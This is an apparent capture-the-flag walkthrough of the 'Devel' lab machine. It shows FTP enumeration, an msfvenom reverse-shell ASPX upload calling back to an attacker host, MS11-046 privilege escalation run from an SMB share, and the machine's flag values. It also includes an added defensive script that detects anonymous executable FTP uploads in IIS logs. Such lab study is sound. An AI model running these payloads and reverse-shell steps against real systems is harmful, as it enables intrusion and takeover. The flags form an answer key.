Devel
Initial Enumeration
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-24 06:40 EDT
Nmap scan report for 10.10.10.5
Host is up (0.16s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.5 -p21,80 -sV -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-24 06:41 EDT
Nmap scan report for 10.10.10.5
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 164.04 ms 10.10.14.1
2 164.12 ms 10.10.10.5
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.54 seconds
FTP
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp> get welcome.png
local: welcome.png remote: welcome.png
229 Entering Extended Passive Mode (|||49160|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************| 180 KiB 180.57 KiB/s 00:00 ETAftp: Reading from network: Interrupted system call
0% | | -1 0.00 KiB/s --:-- ETA
226 Transfer complete.
WARNING! 820 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
ftp> get iisstart.htm
local: iisstart.htm remote: iisstart.htm
229 Entering Extended Passive Mode (|||49161|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************| 689 4.12 KiB/s 00:00 ETA
226 Transfer complete.
689 bytes received in 00:00 (4.12 KiB/s)
ftp> cd aspnet_client
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49162|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49164|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> 2_0_50727
226 Transfer complete.
ftp> cd 2_0_50727
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49166|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
┌──(kali㉿kali)-[~]
└─$ cat iisstart.htm
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS7</title>
<style type="text/css">
<!--
body {
color:#000000;
background-color:#B3B3B3;
margin:0;
}
#container {
margin-left:auto;
margin-right:auto;
text-align:center;
}
a img {
border:none;
}
-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>
</div>
</body>
</html>
Initial Foothold
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f aspx > devel.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2716 bytes
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put devel.aspx
local: devel.aspx remote: devel.aspx
229 Entering Extended Passive Mode (|||49176|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************| 2914 49.62 MiB/s --:-- ETA
226 Transfer complete.
2914 bytes sent in 00:00 (17.26 KiB/s)
ftp>
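The upload above succeeds because the anonymous FTP account can write into the directory IIS serves, so any .aspx dropped there is executed on the next HTTP request. The following detection is an added example written for this page, not code from the writeup or from Microsoft: it parses IIS FTP logs in W3C format (column order taken from the #Fields header rather than hard-coded), and flags completed STOR/STOU/APPE transfers made by an anonymous account or landing a server-executable file type. The log lines are constructed to mirror this session; the field list, the extension set and the "anonymous"/"ftp" account names are assumptions to adjust for a real site.

```python
"""Flag anonymous FTP uploads of server-executable files in IIS W3C logs.

Added detection example (not from the Devel writeup or any vendor tool). It
parses W3C-format lines as IIS FTP writes them, using the #Fields header to
map columns, and flags completed STOR/STOU/APPE transfers that were either
performed by an anonymous account or dropped a file type IIS will execute if
the FTP root overlaps the web root (the condition exploited on this box).
The log lines below are CONSTRUCTED to mirror the session on this page.
"""
import os
from dataclasses import dataclass
from typing import Dict, Iterator, List

UPLOAD_COMMANDS = {"STOR", "STOU", "APPE"}
# Extensions IIS hands to a script handler when requested over HTTP (assumed set).
EXECUTABLE_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".config"}
ANONYMOUS_USERS = {"anonymous", "ftp"}

SAMPLE_FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Date: 2024-10-24 10:40:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status
2024-10-24 10:40:01 10.10.14.5 - 10.10.10.5 21 ControlChannelOpened - - 0
2024-10-24 10:40:01 10.10.14.5 - 10.10.10.5 21 USER anonymous 331 0
2024-10-24 10:40:02 10.10.14.5 anonymous 10.10.10.5 21 PASS *** 230 0
2024-10-24 10:40:05 10.10.14.5 anonymous 10.10.10.5 21 RETR welcome.png 226 0
2024-10-24 10:41:10 10.10.14.5 anonymous 10.10.10.5 21 STOR devel.aspx 226 0
2024-10-24 10:41:12 10.10.14.5 anonymous 10.10.10.5 21 ControlChannelClosed - - 0
2024-10-24 11:02:30 192.0.2.7 backupsvc 10.10.10.5 21 STOR nightly.zip 226 0
2024-10-24 11:05:00 192.0.2.9 anonymous 10.10.10.5 21 STOR notes.txt 550 1326
"""


@dataclass(frozen=True)
class Finding:
    when: str
    client_ip: str
    user: str
    path: str
    severity: str
    reason: str


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if not fields:
            raise ValueError("data line encountered before a #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or otherwise malformed line; skip it
        yield dict(zip(fields, values))


def find_suspicious_uploads(text: str) -> List[Finding]:
    """Return findings for completed uploads that are anonymous, executable, or both."""
    findings: List[Finding] = []
    for rec in parse_w3c(text):
        if rec.get("cs-method", "").upper() not in UPLOAD_COMMANDS:
            continue
        if not rec.get("sc-status", "").startswith("2"):
            continue  # only transfers the server actually completed
        user = rec.get("cs-username", "-").lower()
        path = rec.get("cs-uri-stem", "")
        ext = os.path.splitext(path)[1].lower()
        reasons = []
        if user in ANONYMOUS_USERS:
            reasons.append("write by anonymous account")
        if ext in EXECUTABLE_EXTENSIONS:
            reasons.append(f"server-executable file type {ext}")
        if not reasons:
            continue
        findings.append(Finding(
            when=f"{rec.get('date', '?')} {rec.get('time', '?')}",
            client_ip=rec.get("c-ip", "?"),
            user=user,
            path=path,
            severity="high" if len(reasons) == 2 else "medium",
            reason="; ".join(reasons),
        ))
    return findings


if __name__ == "__main__":
    for f in find_suspicious_uploads(SAMPLE_FTP_LOG):
        print(f"[{f.severity}] {f.when} {f.client_ip} {f.user} STOR {f.path}: {f.reason}")
```

Run against the sample, only the devel.aspx upload is reported (severity high: anonymous account and executable type); the RETR of welcome.png, the authenticated zip upload and the failed 550 upload are ignored. The same parser can be pointed at the IIS web logs to confirm a follow-up GET for the uploaded path, which on this box is the request that launched the reverse shell.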
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.5] 49195
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
c:\Users>systeminfo
systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31
System Boot Time: 24/10/2024, 1:39:29
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.455 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.533 MB
Virtual Memory: In Use: 608 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 4
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
[02]: fe80::9c08:298d:29c1:27df
[03]: dead:beef::292a:ebfc:8e34:a619
[04]: dead:beef::9c08:298d:29c1:27df
Privilege Escalation
https://www.rapid7.com/blog/post/2009/12/28/exploiting-microsoft-iis-with-metasploit/
┌──(kali㉿kali)-[~]
└─$ i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32
┌──(kali㉿kali)-[~]
└─$ impacket-smbserver kali Desktop
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.5,49173)
[*] AUTHENTICATE_MESSAGE (\,DEVEL)
[*] User DEVEL\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Disconnecting Share(1:KALI)
[*] AUTHENTICATE_MESSAGE (\,DEVEL)
[*] User DEVEL\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] AUTHENTICATE_MESSAGE (\,DEVEL)
[*] User DEVEL\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[-] Unknown level for query path info! 0x4
c:\Windows\System32\inetsrv>\\10.10.14.5\kali\MS11046.exe
\\10.10.14.5\kali\MS11046.exe
c:\Windows\System32>whoami
whoami
nt authority\system
c:\Windows\System32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
6e2fedcb532ba90ef7a2d20fc6e9a6ff
c:\Windows\System32>type C:\Users\babis\Desktop\user.txt
type C:\Users\babis\Desktop\user.txt
b17a4ce7fc2a4cd35301ee7870938e48
b17a4ce7fc2a4cd35301ee7870938e48
6e2fedcb532ba90ef7a2d20fc6e9a6ff